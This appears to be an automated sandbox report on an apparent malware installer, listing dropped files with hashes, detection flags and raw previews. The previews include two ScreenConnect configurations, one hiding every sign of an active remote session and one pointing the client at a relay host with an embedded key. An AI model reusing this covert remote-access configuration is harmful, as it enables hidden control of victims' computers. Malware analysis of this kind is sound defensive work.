                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........}....}H..}H..}H.d~I..}H.dxIG.}H.dyI..}H..xI..}H..yI..}H..~I..}H..|H8.}H..}H..}H2.}I..}H2..I..}HRich..}H........PE..d.....Gf.........." ...'.P...........H....................................... ......q.....`......................................... ...t....................P...y.......(......,4.....T.......................(.......@............`...............................text....O.......P.................. ..`.rdata...z...`...|...T..............@..@.data....d.......0..................@....pdata...y...P...z..................@..@_RDATA...............z..............@..@.reloc..,4.......6...|..............@..B................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):81688
                                        Entropy (8bit):5.8618809599146005
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:1AEE526DC110E24D1399AFFCCD452AB3
                                        SHA1:04DB0E8772933BC57364615D0D104DC2550BD064
                                        SHA-256:EBD04A4540D6E76776BD58DEEA627345D0F8FBA2C04CC65BE5E979A8A67A62A1
                                        SHA-512:482A8EE35D53BE907BE39DBD6C46D1F45656046BACA95630D1F07AC90A66F0E61D41F940FB166677AC4D5A48CF66C28E76D89912AED3D673A80737732E863851
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        Reputation:unknown
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....o..........."...0..@...........^... ...`....@.. .......................`.......$....@..................................^..O....`...................)...@.......]..8............................................ ............... ..H............text....>... ...@.................. ..`.rsrc........`.......B..............@..@.reloc.......@......................@..B.................^......H....... +..@2..................`]........................................(....*^.(.......;...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........s>....(....(....(....(....(.....(....(......s....}B....s....}C....~@...%-.&~?.....<...s ...%.@...o...+.....@...s ...o...+......A...s!...o...+}D.......B...s"...o...+.......(#...&......(#...& .... ...........($...&s....t......r...prs..p(%...(&...~>...%-.&...'...s(...%.>.....A...().......(*........(+...o,...(-...t....
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):951
                                        Entropy (8bit):4.682753739900415
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:A86EDEABE4F506104C9B4A70EC058203
                                        SHA1:90F2C46B4C7EA592EE2027CBE85239878B21CD65
                                        SHA-256:1559FF67FB04A2DEB98A1733D1E1B61DD48D406CF70A0A1D2F386EE65ACD805E
                                        SHA-512:B5261E93D9DD436B885661E57AA2F75654B50675DDF8DEA06AEF0DB0E02AD9194A80DFFAB93A7FDC10B20EB1A1AF36E80E8C4069F7004BD5C69DB675CA17DCA2
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:<?xml version="1.0"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="AccessShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessShowBalloonOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="ShowBalloonOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessShowBalloonOnHide" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessShowSystemTrayIcon" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="ShowSystemTrayIcon" serializeAs="String">.. <value>false</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:XML 1.0 document, ASCII text, with very long lines (466), with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):956
                                        Entropy (8bit):5.7620094502294785
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:5BEECFFFFC74F49700D1EAC5A1AC5545
                                        SHA1:F7FFBDC8E37A62B480DDD3D04A52F8A3418D5F20
                                        SHA-256:257FA1FF9F14E80025ACBEA5CEB1EE308C32A948289361F8DCDA666C82B8FB82
                                        SHA-512:B0E447C5062116E2B1F6AB5E619D095B63E85076F83E912BF038CEB6DC7984F0E5FF0FF26FFABE5ABD5CCEAE498B1562EB63784A8C019551FAAD3B828FEFBC85
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="ClientLaunchParametersConstraint" serializeAs="String">.. <value>?h=slplegalfinance.com&amp;p=443&amp;k=BgIAAACkAABSU0ExAAgAAAEAAQDVyeZoBLn8WdM6xWDr4b0uAsUBfhP2EJOSdZugmbrUWVWehsUh2LvfCfwDYGcJBhcBEWS%2fDmahaCPw1tkv%2f%2bw18TIjThn%2bQ%2feZavwugcHDfdkaqKi0LnYdddcCsozuL7%2bVQevv9snFAHOiSjLD7xdNlPMSw%2bw682fIJIkr8XbdhPPukmg4Ksp6Kf1Xba7KkmNnwSS1MRXckDb%2f1hQrUI%2fSZZdGbJvZ3tc%2f3CR0LXLnGeCLG7Dt5iRIHwzJf5XuTInHiPesoO6bSk%2bUfoeCYO3BjvU6pRL6UKY08mjZ7e%2b6FOQb4acTm6QTR9K%2fsvFdvWQ%2br7EyKwXpSy6iTh4x7%2f%2bv</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):1310720
                                        Entropy (8bit):0.40699615915369003
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:A940A3E4D46982A6327F2BD0FFE9BBA1
                                        SHA1:0D6BF61C7937BAAFFED1503088DB6B5318FA1FDB
                                        SHA-256:13B89A62C9126BD2C5FA4A6ACC086A9F8E7F13E3044B485E66714A731E2CB9C8
                                        SHA-512:C6E76F14FD83BD3E2C4ABFFA04EF6227C97A0E53CBE33AD9E35F7729B93AFD347E459F622062EB532FF3FE9C53FB25D9CB7C9EE402E6FD5D82F1B1C662578C0B
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:.B..........@..@ /...{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.................................%.O._..r.#.........`h.................h...............X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):16384
                                        Entropy (8bit):0.07727367908817023
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:CD8F9CCD542AA2FFE6E1C017D91A211E
                                        SHA1:5D660FB2F5FB4D7B5B820AA132D532333B0E084F
                                        SHA-256:C40F13D8B94F5DFE3155BF76C32D06B8411369786EBF2E7E2ECEB521F322677B
                                        SHA-512:4E775E6010CE94E93F2594C9EF8D0BB9EA90E4BC9EA92A2BDA50C210463CF3B3646F776B8D13AF487BFCCA7813C42A4698BADF121B44582442397618708BECD1
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:...s.....................................;...{..:....}.......{...............{.......{..8. u.....{.&................ .h.:....}..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\SysWOW64\msiexec.exe
                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
                                        Category:dropped
                                        Size (bytes):1088392
                                        Entropy (8bit):7.789940577622617
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:8A8767F589EA2F2C7496B63D8CCC2552
                                        SHA1:CC5DE8DD18E7117D8F2520A51EDB1D165CAE64B0
                                        SHA-256:0918D8AB2237368A5CEC8CE99261FB07A1A1BEEDA20464C0F91AF0FE3349636B
                                        SHA-512:518231213CA955ACDF37B4501FDE9C5B15806D4FC166950EB8706E8D3943947CF85324FAEE806D7DF828485597ECEFFCFA05CA1A5D8AB1BD51ED12DF963A1FE4
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        Reputation:unknown
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........S.c.2.0.2.0.2.0..|0.2.0..H0.2.0.Jq0.2.0.2.0.2.0..I0.2.0..y0.2.0..x0.2.0...0.2.0Rich.2.0................PE..L...9..P...........!.........H.......i.......................................p............@..............................*..l...x....@.......................P..d.......................................@...............h............................text............................... ..`.rdata..............................@..@.data....-..........................@....rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):234
                                        Entropy (8bit):4.977464602412109
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:6F52EBEA639FD7CEFCA18D9E5272463E
                                        SHA1:B5E8387C2EB20DD37DF8F4A3B9B0E875FA5415E3
                                        SHA-256:7027B69AB6EBC9F3F7D2F6C800793FDE2A057B76010D8CFD831CF440371B2B23
                                        SHA-512:B5960066430ED40383D39365EADB3688CADADFECA382404924024C908E32C670AFABD37AB41FF9E6AC97491A5EB8B55367D7199002BF8569CF545434AB2F271A
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:.<?xml version="1.0" encoding="utf-8" ?>..<configuration>.. <startup useLegacyV2RuntimeActivationPolicy="true">.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>..</configuration>
                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):49152
                                        Entropy (8bit):4.62694170304723
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:77BE59B3DDEF06F08CAA53F0911608A5
                                        SHA1:A3B20667C714E88CC11E845975CD6A3D6410E700
                                        SHA-256:9D32032109FFC217B7DC49390BD01A067A49883843459356EBFB4D29BA696BF8
                                        SHA-512:C718C1AFA95146B89FC5674574F41D994537AF21A388335A38606AEC24D6A222CBCE3E6D971DFE04D86398E607815DF63A54DA2BB96CCF80B4F52072347E1CE6
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        Reputation:unknown
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0...... ........... ........... ...............................$....@....................................O.................................................................................... ............... ..H............text... .... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):36864
                                        Entropy (8bit):4.340550904466943
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:4717BCC62EB45D12FFBED3A35BA20E25
                                        SHA1:DA6324A2965C93B70FC9783A44F869A934A9CAF7
                                        SHA-256:E04DE7988A2A39931831977FA22D2A4C39CF3F70211B77B618CAE9243170F1A7
                                        SHA-512:BB0ABC59104435171E27830E094EAE6781D2826ED2FC9009C8779D2CA9399E38EDB1EC6A10C1676A5AF0F7CACFB3F39AC2B45E61BE2C6A8FE0EDB1AF63A739CA
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        Reputation:unknown
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0..`... .......~... ........... ....................................@.................................X~..O................................... }............................................... ............... ..H............text....^... ...`.................. ..`.rsrc................p..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):57344
                                        Entropy (8bit):4.657268358041957
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:A921A2B83B98F02D003D9139FA6BA3D8
                                        SHA1:33D67E11AD96F148FD1BFD4497B4A764D6365867
                                        SHA-256:548C551F6EBC5D829158A1E9AD1948D301D7C921906C3D8D6B6D69925FC624A1
                                        SHA-512:E1D7556DAF571C009FE52D6FFE3D6B79923DAEEA39D754DDF6BEAFA85D7A61F3DB42DFC24D4667E35C4593F4ED6266F4099B393EFA426FA29A72108A0EAEDD3E
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        Reputation:unknown
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0...... ........... ........... ....................... .......t....@.....................................O...................................`................................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):176128
                                        Entropy (8bit):5.775360792482692
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:5EF88919012E4A3D8A1E2955DC8C8D81
                                        SHA1:C0CFB830B8F1D990E3836E0BCC786E7972C9ED62
                                        SHA-256:3E54286E348EBD3D70EAED8174CCA500455C3E098CDD1FCCB167BC43D93DB29D
                                        SHA-512:4544565B7D69761F9B4532CC85E7C654E591B2264EB8DA28E60A058151030B53A99D1B2833F11BFC8ACC837EECC44A7D0DBD8BC7AF97FC0E0F4938C43F9C2684
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        Reputation:unknown
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0...... ......~.... ........... ..............................!|....@.................................,...O.................................................................................... ............... ..H............text....w... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):11776
                                        Entropy (8bit):5.273875899788767
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:73A24164D8408254B77F3A2C57A22AB4
                                        SHA1:EA0215721F66A93D67019D11C4E588A547CC2AD6
                                        SHA-256:D727A640723D192AA3ECE213A173381682041CB28D8BD71781524DBAE3DDBF62
                                        SHA-512:650D4320D9246AAECD596AC8B540BF7612EC7A8F60ECAA6E9C27B547B751386222AB926D0C915698D0BB20556475DA507895981C072852804F0B42FDDA02B844
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        Reputation:unknown
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..&...........E... ...`....... ..............................D9....@..................................D..O....`..............................$D..8............................................ ............... ..H............text...4%... ...&.................. ..`.rsrc........`.......(..............@..@.reloc...............,..............@..B.................E......H........'.......................C........................................(....*^.(.......&...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........s.......}.....s....}.....{....r...p(......,h.{....r...p......%...(.....rS..p.(....~....%-.&~..........s....%......(...+%-.&+.(...........s....(...+&.{....o....-!.{.....{.....{....rc..po....(.....{....o.........{.....{.....{....r}..po....(.....{....o....-..{....r...p......(.....*.{....s .....-..o!.......{....r}..p.o
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Jan 6 12:00:42 2025, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                        Category:dropped
                                        Size (bytes):2677
                                        Entropy (8bit):3.9883433216369224
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:D27E10DC2089E0BFFF8A76D42E077AED
                                        SHA1:BE9ABACD725A6180CFBF96FC869D636FEB7790AE
                                        SHA-256:68F3EC5E2EB8E572D535D79313178687A7012B6EDEF8BE7106971919B49E84DB
                                        SHA-512:5389F0597C49A589453DB25F13095209CAB25CDF179367D037F63891D19344E05D87A3223EF80D070BA7E5E9B9370F74BE4653E8539DE02FC677E5D1C646A714
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:L..................F.@.. ...$+.,....cF..:`......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I&Z.h....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V&Z.h....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V&Z.h....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V&Z.h...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V&Z.h...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............I/$.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Jan 6 12:00:42 2025, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                        Category:dropped
                                        Size (bytes):2679
                                        Entropy (8bit):4.005316326320001
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:64C2BBB058244FCD2768C4A7AAE9496A
                                        SHA1:05A21A33DDE1A5CC649F92B92B47F74CFDBD2060
                                        SHA-256:5FC439D7C69CFEC6B233077AF5B388EE0A84484CC30BF07D2B2418E96BEFB725
                                        SHA-512:B5176C2FC3EE497B457FDA93BAFA62AA48572A768458E947F2374372465C430FAADDCF395C9E787727BA1AE3AACF557790F37A325E4CCBF473CA4FBECD1FBDA9
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:L..................F.@.. ...$+.,....o8..:`......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I&Z.h....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V&Z.h....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V&Z.h....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V&Z.h...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V&Z.h...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............I/$.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:54:41 2023, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                        Category:dropped
                                        Size (bytes):2693
                                        Entropy (8bit):4.015440715670797
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:9FD51F210CBAB582C8C7A219BEBCA2A2
                                        SHA1:75711242AB690F8D3A5D81D68767FCEF09150534
                                        SHA-256:A3645A83BF0968E35154449C8CA9DD7CDC29D56BF3F1EC72E566641B89EEB7C1
                                        SHA-512:AD83E79755BF17E54CB124032087E24CB585F86C038290DE4BD40C62705C35B9B87AFA62DAA6CB01FEB8BA121FB37BADAAEA5EA2FE0E21DADD480ACBCFB0D362
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:L..................F.@.. ...$+.,.....v. ;.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I&Z.h....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V&Z.h....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V&Z.h....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V&Z.h...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VFW.N...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............I/$.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Jan 6 12:00:42 2025, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                        Category:dropped
                                        Size (bytes):2681
                                        Entropy (8bit):4.005155231052511
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:84A9FF1504FEF73167FAB70A548AD9F2
                                        SHA1:1992D5AA7B46424C7B5992B09F3D7F063C64AB1B
                                        SHA-256:BB80CF6941A58B092584C250E10A202B7182CF20D59E5C6A02BA365B0E0DFCFC
                                        SHA-512:6469B0C8C916876324F84C6B81C26124BCF4856F551FDC6C6FDD07AC94FE7BC44AFAED7D6954AD4225CA15ADAA5C61F01EC35AF2A0A5E11E81D198F393CA04C1
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:L..................F.@.. ...$+.,........:`......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I&Z.h....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V&Z.h....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V&Z.h....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V&Z.h...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V&Z.h...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............I/$.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Jan 6 12:00:42 2025, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                        Category:dropped
                                        Size (bytes):2681
                                        Entropy (8bit):3.993499260953557
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:432E75BC1469001AE7D44FB85C9245F4
                                        SHA1:A61744EB4B2795DCCEAF5AB2D4D139C9CAE04C00
                                        SHA-256:0F400DF8DD76D9B2D3991AD1606D310997924A7CFC74999EED51E3C128DA1C96
                                        SHA-512:77CD3573E3893FC99CC5CAF00195E4F5750A1C583A92997BBE3AAA7898C737950361E7B0B660DBAD0D881AB775817C3CFF265F00B8AF0D6BFF3D897591CF32EC
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:L..................F.@.. ...$+.,........:`......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I&Z.h....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V&Z.h....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V&Z.h....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V&Z.h...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V&Z.h...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............I/$.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Jan 6 12:00:42 2025, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                        Category:dropped
                                        Size (bytes):2683
                                        Entropy (8bit):4.004835280661964
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:45472860E54C5364B02D1FFBB894748D
                                        SHA1:B12D36951ED18FB2B738D666E46B27D3707C15ED
                                        SHA-256:8B8FB227804ECED37AEE8E186F3CAF5ADACA9B167AE9827320A12ED441461FB5
                                        SHA-512:BF799D56D25099511FAB2C923A568B41DA77150F3E1EC7A119607E8B8357BDEC13F7C57F6AD0705A601669F779A0653BA15E763C24F4F8B73C1DB5B5BE161D92
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:L..................F.@.. ...$+.,....SD..:`......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I&Z.h....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V&Z.h....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V&Z.h....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V&Z.h...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V&Z.h...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............I/$.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):0
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:70D47FA2E078F04400D3D1B236245678
                                        SHA1:987AA3368265FC300B10B4128D8367C3D7A29C6C
                                        SHA-256:B0A8D541B650FFFF1BB4B3690AF389E52B1675212129560DBE33038B1041266B
